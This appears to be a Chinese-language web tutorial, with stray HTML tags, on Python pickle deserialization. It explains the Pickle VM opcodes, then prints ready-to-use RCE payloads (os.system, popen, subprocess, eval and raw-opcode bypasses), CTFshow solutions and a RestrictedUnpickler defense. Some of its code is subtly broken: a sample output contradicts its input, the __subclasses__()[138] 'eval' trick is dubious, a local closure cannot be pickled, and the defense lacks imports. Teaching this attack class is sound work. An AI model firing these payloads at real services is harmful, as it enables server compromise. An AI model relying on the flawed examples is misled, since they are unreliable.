Python Pickle 反序列化漏洞深度解析<\/h1>

1. Pickle 基础<\/h2>

1.1 什么是 Pickle？<\/h3>
Pickle 是 Python 内置的序列化\/反序列化模块，它能将任意 Python 对象转换为二进制流并还原。与 JSON 的主要区别在于：<\/p>
对比项<\/th> Pickle<\/th> JSON<\/th> <\/tr> <\/thead>
可存储类型<\/td> 任意 Python 对象(类、函数、集合等)<\/td> 基本数据类型(数字、字符串、数组、字典)<\/td> <\/tr>
跨语言性<\/td> Python 专用<\/td> 跨语言<\/td> <\/tr>
安全性<\/td>
反序列化可执行代码 → 有安全风险<\/td>
相对安全(只解析数据)<\/td> <\/tr> <\/tbody> <\/table>
Pickle 文档明确警告："pickle 模块不安全；只有在信任数据源时才使用。恶意构造的 pickle 数据可以在反序列化时执行任意代码"。<\/p>
1.2 基本用法<\/h3>
Pickle 提供两个基本函数：<\/p>
# 序列化<\/span>
<\/span><\/span>pickle.<\/span>dumps(obj)  # 返回字节流<\/span>
<\/span><\/span>pickle.<\/span>dump(obj, file)  # 写入文件<\/span>
<\/span><\/span>
<\/span><\/span># 反序列化<\/span>
<\/span><\/span>pickle.<\/span>loads(data)  # 从字节流加载<\/span>
<\/span><\/span>pickle.<\/span>load(file)  # 从文件加载<\/span>
<\/span><\/span><\/code><\/pre>序列化示例：<\/p>
import<\/span> pickle
<\/span><\/span>
<\/span><\/span>data =<\/span> {"name"<\/span>: "YoSheep"<\/span>, "role"<\/span>: "people"<\/span>}
<\/span><\/span>ser =<\/span> pickle.<\/span>dumps(data)  # 序列化<\/span>
<\/span><\/span>obj =<\/span> pickle.<\/span>loads(ser)  # 反序列化<\/span>
<\/span><\/span>print(obj)  # {'name': 'Sunny', 'role': 'people'}<\/span>
<\/span><\/span><\/code><\/pre>1.3 自定义序列化行为<\/h3>
Python 允许类定义特殊方法来自定义序列化行为：<\/p>

__getstate__<\/code> \/ __setstate__<\/code>：自定义实例状态存取<\/li>
__reduce__<\/code> \/ __reduce_ex__<\/code>：在反序列化时自动调用，返回描述如何重构对象的可调用对象和参数元组<\/li>
<\/ul>
__reduce__()<\/code> 可以返回 (func, args)<\/code>，Pickle 在加载时会执行 func(*args)<\/code> 来重建对象。如果返回了额外的状态值，Unpickler 会调用 __setstate__<\/code> 来设置状态。<\/p>
2. 漏洞原理<\/h2>
2.1 Pickle 虚拟机(PVM)<\/h3>
Pickle 反序列化过程相当于一个完整的虚拟机(Pickle VM,简称 PVM)在 Python 解释器中执行字节码序列。PVM 包含：<\/p>

指令解析器：依次读取并执行操作码<\/li>
操作栈：使用 Python list 实现，临时存储数据和中间结果<\/li>
memo：使用 Python dict 实现，用于避免重复反序列化同一对象<\/li>
<\/ol>
常见操作码(opcode)：<\/p>



指令<\/th>
描述<\/th>
栈变化<\/th>
<\/tr>
<\/thead>


c<\/td>
获取全局对象或导入模块<\/td>
获得的对象入栈<\/td>
<\/tr>

o<\/td>
调用栈中的函数<\/td>
函数和参数出栈，返回值入栈<\/td>
<\/tr>

i<\/td>
c 和 o 的组合<\/td>
同 c 和 o<\/td>
<\/tr>

R<\/td>
调用函数(栈顶为函数，次顶为参数)<\/td>
函数和参数出栈，返回值入栈<\/td>
<\/tr>

(<\/td>
压入 MARK 标记<\/td>
MARK 标记入栈<\/td>
<\/tr>

t<\/td>
组合 MARK 到当前的数据为元组<\/td>
MARK 和数据出栈，元组入栈<\/td>
<\/tr>

.<\/td>
程序结束<\/td>
返回栈顶元素<\/td>
<\/tr>
<\/tbody>
<\/table>
2.2 漏洞利用机制<\/h3>
攻击者可以在自定义类的 __reduce__<\/code> 方法中返回 (os.system, ('命令',))<\/code>，将 os.system 函数及参数注入 Pickle 流。反序列化时：<\/p>

导入 os.system<\/li>
创建参数元组 ('命令',)<\/li>
执行 REDUCE 调用命令<\/li>
<\/ol>
攻击链：<\/p>
[Evil().__reduce__ 返回 os.system 及参数] 
→ Pickler.dumps() → [Pickle字节流] 
→ Unpickler.loads() → [PVM 执行 os.system('命令')]
<\/code><\/pre>
2.3 漏洞危害<\/h3>
反序列化 Pickle 数据会执行其中指定的指令序列，攻击者可以：<\/p>

执行任意系统命令<\/li>
执行任意 Python 代码<\/li>
读取\/修改文件系统<\/li>
建立反向 shell<\/li>
<\/ol>
3. 漏洞利用技术<\/h2>
3.1 基础利用<\/h3>
直接 RCE：<\/p>
import<\/span> pickle
<\/span><\/span>import<\/span> os
<\/span><\/span>
<\/span><\/span>class<\/span> Evil<\/span>:
<\/span><\/span>    def<\/span> __reduce__<\/span>(self):
<\/span><\/span>        return<\/span> (os.<\/span>system, ('id'<\/span>,))
<\/span><\/span>
<\/span><\/span>payload =<\/span> pickle.<\/span>dumps(Evil())
<\/span><\/span>pickle.<\/span>loads(payload)  # 执行 os.system('id')<\/span>
<\/span><\/span><\/code><\/pre>构造 opcode payload：<\/p>
import<\/span> pickletools
<\/span><\/span>
<\/span><\/span>opcode =<\/span> b<\/span>'''cos
<\/span><\/span><\/span>system
<\/span><\/span><\/span>(S'whoami'
<\/span><\/span><\/span>tR.'''<\/span>
<\/span><\/span>pickletools.<\/span>dis(opcode)
<\/span><\/span>pickle.<\/span>loads(opcode)  # 执行 whoami<\/span>
<\/span><\/span><\/code><\/pre>3.2 绕过技术<\/h3>
使用替代函数<\/h4>
当 os.system 被禁用时：<\/p>
# 使用 os.popen<\/span>
<\/span><\/span>class<\/span> Exploit<\/span>:
<\/span><\/span>    def<\/span> __reduce__<\/span>(self):
<\/span><\/span>        return<\/span> (os.<\/span>popen, ('id'<\/span>,))
<\/span><\/span>
<\/span><\/span># 使用 subprocess.Popen<\/span>
<\/span><\/span>class<\/span> Exploit<\/span>:
<\/span><\/span>    def<\/span> __reduce__<\/span>(self):
<\/span><\/span>        return<\/span> (subprocess.<\/span>Popen, (['\/bin\/sh'<\/span>,'-c'<\/span>,'id'<\/span>],))
<\/span><\/span><\/code><\/pre>使用 eval\/exec<\/h4>
class<\/span> Exploit<\/span>:
<\/span><\/span>    def<\/span> __reduce__<\/span>(self):
<\/span><\/span>        return<\/span> (__import__('builtins'<\/span>).<\/span>__dict__['eval'<\/span>], 
<\/span><\/span>                ("__import__('os').system('id')"<\/span>,))
<\/span><\/span><\/code><\/pre>跳过 find_class 检查<\/h4>
通过对象属性间接获取函数：<\/p>
class<\/span> Exploit<\/span>:
<\/span><\/span>    def<\/span> __reduce__<\/span>(self):
<\/span><\/span>        # 通过 __class__.__base__.__subclasses__() 获取 builtins<\/span>
<\/span><\/span>        builtins_eval =<\/span> ().<\/span>__class__.<\/span>__base__.<\/span>__subclasses__()[138<\/span>]
<\/span><\/span>        return<\/span> (builtins_eval, ("__import__('os').system('id')"<\/span>,))
<\/span><\/span><\/code><\/pre>利用函数闭包变量<\/h4>
def<\/span> outer<\/span>():
<\/span><\/span>    def<\/span> inner<\/span>():
<\/span><\/span>        return<\/span> __builtins__['eval'<\/span>]
<\/span><\/span>    return<\/span> inner
<\/span><\/span>
<\/span><\/span>class<\/span> Exploit<\/span>:
<\/span><\/span>    def<\/span> __reduce__<\/span>(self):
<\/span><\/span>        return<\/span> (outer(), ("__import__('os').system('id')"<\/span>,))
<\/span><\/span><\/code><\/pre>间接访问 builtins<\/strong><\/h4>
# 通过 builtins.getattr 和 globals() 获取 eval<\/span>
<\/span><\/span>payload =<\/span> b<\/span>'''cbuiltins
<\/span><\/span><\/span>getattr
<\/span><\/span><\/span>(cbuiltins
<\/span><\/span><\/span>dict
<\/span><\/span><\/span>S'get'
<\/span><\/span><\/span>tR(cbuiltins
<\/span><\/span><\/span>globals
<\/span><\/span><\/span>)RS'__builtins__'
<\/span><\/span><\/span>tR(cbuiltins
<\/span><\/span><\/span>getattr
<\/span><\/span><\/span>RS'eval'
<\/span><\/span><\/span>tR(S'__import__("os").system("id")'
<\/span><\/span><\/span>tR.'''<\/span>
<\/span><\/span><\/code><\/pre>4. 防御措施<\/h2>

避免反序列化不可信数据<\/strong>：这是最根本的解决方案<\/li>
使用更安全的替代方案<\/strong>：如 JSON、msgpack 等<\/li>
实现 RestrictedUnpickler<\/strong>：重写 find_class() 限制可导入的模块<\/li>
签名验证<\/strong>：对序列化数据进行签名<\/li>
沙箱环境<\/strong>：在受限环境中执行反序列化<\/li>
<\/ol>
示例 RestrictedUnpickler：<\/p>
import<\/span> pickle
<\/span><\/span>
<\/span><\/span>class<\/span> RestrictedUnpickler<\/span>(pickle.<\/span>Unpickler):
<\/span><\/span>    def<\/span> find_class<\/span>(self, module, name):
<\/span><\/span>        # 只允许安全的模块和类<\/span>
<\/span><\/span>        if<\/span> module ==<\/span> 'builtins'<\/span> and<\/span> name in<\/span> ('int'<\/span>, 'str'<\/span>, 'list'<\/span>, 'dict'<\/span>):
<\/span><\/span>            return<\/span> getattr(builtins, name)
<\/span><\/span>        raise<\/span> pickle.<\/span>UnpicklingError(f<\/span>"禁止导入 <\/span>{<\/span>module}<\/span>.<\/span>{<\/span>name}<\/span>"<\/span>)
<\/span><\/span>
<\/span><\/span>def<\/span> safe_loads<\/span>(data):
<\/span><\/span>    return<\/span> RestrictedUnpickler(io.<\/span>BytesIO(data)).<\/span>load()
<\/span><\/span><\/code><\/pre>5. CTF 实战示例<\/h2>
CTFshow-web277<\/h3>
import<\/span> pickle
<\/span><\/span>import<\/span> os
<\/span><\/span>import<\/span> base64
<\/span><\/span>
<\/span><\/span>class<\/span> Evil<\/span>:
<\/span><\/span>    def<\/span> __reduce__<\/span>(self):
<\/span><\/span>        return<\/span> (os.<\/span>system, ('ls \/'<\/span>,))
<\/span><\/span>
<\/span><\/span>payload =<\/span> pickle.<\/span>dumps(Evil())
<\/span><\/span>print(base64.<\/span>b64encode(payload))  # 发送此 payload<\/span>
<\/span><\/span><\/code><\/pre>CTFshow-web278 (过滤 os.system)<\/h3>
import<\/span> pickle
<\/span><\/span>import<\/span> os
<\/span><\/span>import<\/span> base64
<\/span><\/span>
<\/span><\/span>class<\/span> Evil<\/span>:
<\/span><\/span>    def<\/span> __reduce__<\/span>(self):
<\/span><\/span>        return<\/span> (os.<\/span>popen, ('cat flag'<\/span>,))  # 使用 popen 替代 system<\/span>
<\/span><\/span>
<\/span><\/span>payload =<\/span> pickle.<\/span>dumps(Evil())
<\/span><\/span>print(base64.<\/span>b64encode(payload))
<\/span><\/span><\/code><\/pre>或使用 subprocess：<\/p>
class<\/span> Evil<\/span>:
<\/span><\/span>    def<\/span> __reduce__<\/span>(self):
<\/span><\/span>        return<\/span> (subprocess.<\/span>Popen, (['\/bin\/sh'<\/span>, '-c'<\/span>, 'cat flag'<\/span>],))
<\/span><\/span><\/code><\/pre>6. 总结<\/h2>
Python Pickle 反序列化漏洞危害严重，攻击者可以通过构造恶意序列化数据实现任意代码执行。防御的关键在于：<\/p>

永远不要反序列化不可信数据<\/li>
如必须使用 Pickle，实施严格的输入验证和模块限制<\/li>
考虑使用更安全的序列化方案替代 Pickle<\/li>
<\/ol>
理解 Pickle 的工作原理和漏洞机制，有助于开发者编写更安全的代码和安全人员识别相关风险。<\/p>